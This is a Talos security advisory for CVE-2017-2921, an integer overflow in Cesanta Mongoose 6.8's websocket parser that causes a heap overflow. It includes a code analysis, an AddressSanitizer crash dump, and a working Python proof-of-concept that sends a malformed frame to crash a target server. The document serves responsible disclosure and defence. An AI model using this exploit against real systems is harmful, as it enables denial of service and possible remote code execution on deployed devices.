Talos Vulnerability Report

TALOS-2017-0428

Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability

October 31, 2017
CVE Number

CVE-2017-2921

Summary

An exploitable memory corruption vulnerability exists in the Websocket protocol implementation of Cesanta Mongoose 6.8. A specially crafted websocket packet can cause an integer overflow resulting leading to heap buffer overflow resulting in denial of service and potential remote code execution. An attacker needs to send a specially crafted websocket packet over network to trigger this vulnerability.

Tested Versions

Cesanta Mongoose 6.8

Product URLs

https://cesanta.com/

CVSSv3 Score

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-190: Integer Overflow or Wraparound

Details

Mongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. Its HTTP implementation includes upgrade support required for websocket applications. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.

After the initial websocket handshake and while parsing a websocket packet, an integer overflow involving header length and packet size can occur. Insufficient checks after the potential overflow can later lead to very large memory overwrite which can result in heap memory corruption, process crash and potentially in remote code execution.

Function `mg_deliver_websocket_data` is responsible for parsing the websocket packet. Relevant code is:



uint64_t i, data_len = 0, frame_len = 0, buf_len = nc->recv_mbuf.len, len,                  [1]
           mask_len = 0, header_len = 0;
  ...
 if (buf_len >= 2) 
 ...
   else if (buf_len >= 10 + mask_len) 
   header_len = 10 + mask_len;                                                            [2]
   data_len = (((uint64_t) ntohl(*(uint32_t *) &buf[2])) << 32) +                         [3]
              ntohl(*(uint32_t *) &buf[6]);



frame_len = header_len + data_len;                                                         [4]
 ok = frame_len > 0 && frame_len <= buf_len;                                                [5]

 if (ok) 
   ...
   /* Apply mask if necessary */
   if (mask_len > 0) {                
     for (i = 0; i < data_len; i++) 
       buf[i + header_len] ^= (buf + header_len - mask_len)[i % 4];                         [6]

In the above code, we can see at [1] local variables frame_len, header_len and data_len being declared as 64bit unsigned integers. At [2] header length is calculated since websocket protocol specifies variable length headers. At [3], 8 bytes from the packet are used as data_len directly. At [4], total frame_len is calculated and at [5] basic sanity checks are performed. If everything is ok, and the packet has mask bit set, at [6] all the data in the buffer is XORed with 4 byte mask.

An insufficient check above at [5] can allow for an integer overflow to pass undetected. In case data_lenis a very large value, adding header_len to it can lead to integer wraparound , resulting in small frame_len value. Small frame_len value passes frame_len <= buf_len check, while data_len is still huge and bigger than the actual buffer size. This results in a large heap overflow at [6] as the for loop is bounded by data_len only.

This causes the process to crash, leading to denial of service and in some cases potentially to remote code execution.

Crash Information

Address sanitizer output:

==88164==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000006380 at pc 0x00000051abae bp 0x7fffffffb490 sp   
0x7fffffffb488
READ of size 1 at 0x619000006380 thread T0
  #0 0x51abad in mg_deliver_websocket_data /home/user/mongoose/examples/websocket_chat/../../mongoose.c:8866
  #1 0x51abad in ?? ??:0
  #2 0x5128d4 in mg_ws_handler /home/user/mongoose/examples/websocket_chat/../../mongoose.c:9045 (discriminator 1)
  #3 0x5128d4 in ?? ??:0
  #4 0x4f9de6 in mg_call /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2051
  #5 0x4f9de6 in ?? ??:0
  #6 0x4fdcf9 in mg_recv_common /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2502
  #7 0x4fdcf9 in ?? ??:0
  #8 0x506603 in mg_if_recv_tcp_cb /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2506
  #9 0x506603 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3372
  #10 0x506603 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497
  #11 0x506603 in ?? ??:0
  #12 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690
  #13 0x509dd8 in ?? ??:0
  #14 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232
  #15 0x4fb695 in ?? ??:0
  #16 0x4ea65a in main /home/user/mongoose/examples/websocket_chat/websocket_chat.c:78
  #17 0x4ea65a in ?? ??:0
  #18 0x7ffff6ee582f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
  #19 0x7ffff6ee582f in ?? ??:0
  #20 0x418e58 in _start ??:?
  #21 0x418e58 in ?? ??:0


0x619000006380 is located 0 bytes to the right of 1024-byte region [0x619000005f80,0x619000006380)
allocated by thread T0 here:
  #0 0x4b8f88 in __interceptor_malloc ??:?
  #1 0x4b8f88 in ?? ??:0
  #2 0x506453 in mg_handle_tcp_read /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3336 (discriminator 1)
  #3 0x506453 in mg_mgr_handle_conn /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3497 (discriminator 1)
  #4 0x506453 in ?? ??:0
  #5 0x509dd8 in mg_socket_if_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:3690
  #6 0x509dd8 in ?? ??:0
  #7 0x4fb695 in mg_mgr_poll /home/user/mongoose/examples/websocket_chat/../../mongoose.c:2232
  #8 0x4fb695 in ?? ??:0
  #4 0x60200000efef  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/mongoose/examples/websocket_chat/websocket_chat+0x51abad)
Shadow bytes around the buggy address:
0x0c327fff8c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff8c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff8c70:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff8cc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable:           00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone:       fa
Heap right redzone:      fb
Freed heap region:       fd
Stack left redzone:      f1
Stack mid redzone:       f2
Stack right redzone:     f3
Stack partial redzone:   f4
Stack after return:      f5
Stack use after scope:   f8
Global redzone:          f9
Global init order:       f6
Poisoned by user:        f7
Container overflow:      fc
Array cookie:            ac
Intra object redzone:    bb
ASan internal:           fe
Left alloca redzone:     ca
Right alloca redzone:    cb
==88164==ABORTING

Exploit Proof-of-Concept

import socket
import struct
import sys
http_upgrade = ('GET /chat HTTP/1.1\r\n'
              'Host: server.example.com\r\n'
              'Upgrade: websocket\r\n'
              'Connection: Upgrade\r\n'
              'Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\n'
              'Sec-WebSocket-Protocol: chat, superchat\r\n'
              'Sec-WebSocket-Version: 13\r\n'
              'Origin: http://example.com\r\n\r\n')
#only HTTP "Upgrade: websocket" header matters above, the above GET request was copied verbatim from wikipedia


payload = "\x00" # FIN flag doesn't matter, opcode doesn't matter
payload += chr(0x80 | 127 ) # mask is set, payload len of 127 means next 64 bits are actual payload len
payload_len = 0xffffffffffffffff -12   #actual payload len
payload += struct.pack("!Q",payload_len)
masking_key = 0 #masking key can be anything, and would need to be a specific value in real exploit
payload += struct.pack("I",masking_key)
payload += "A"*40 #garbage to pad the packet


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.send(http_upgrade)
print s.recv(1024)
s.send(payload)
print s.recv(1024)

Timeline

2017-08-30 - Vendor Disclosure
2017-10-31 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.